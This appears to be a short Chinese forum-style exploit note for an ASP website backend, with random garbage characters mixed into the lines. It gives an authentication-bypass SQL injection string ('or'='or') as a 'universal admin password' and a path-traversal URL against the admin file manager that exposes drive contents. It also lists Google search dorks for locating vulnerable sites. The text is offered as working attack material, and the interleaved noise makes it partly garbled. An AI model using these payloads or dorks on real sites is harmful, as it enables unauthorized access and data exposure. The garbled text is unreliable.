后台万能密码 'or'='or'
7 _- N0 V4 D' `6 Y' y% g+ ~* {3 a8 r5 P1 C
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!5 B: u9 j% j$ c7 h
admin/uploadfile.asp?currentFolder=/upfiles/../
* ]) i. }2 n. [1 p
: F% O+ w, X7 A, Q! ?% ^# P4 }漏洞证明:
. b, e7 F; [+ j+ v% g, v, k4 l; j v+ t3 @" e) {
谷歌:inurl:type.asp?id=1 新闻中心
7 X9 u( o2 ?* t5 Y ]' P F5 O或者 :inurl:download_ok.asp?
; a, {" \( Q j, z4 n' b( k0 l! Z+ \( r6 j
|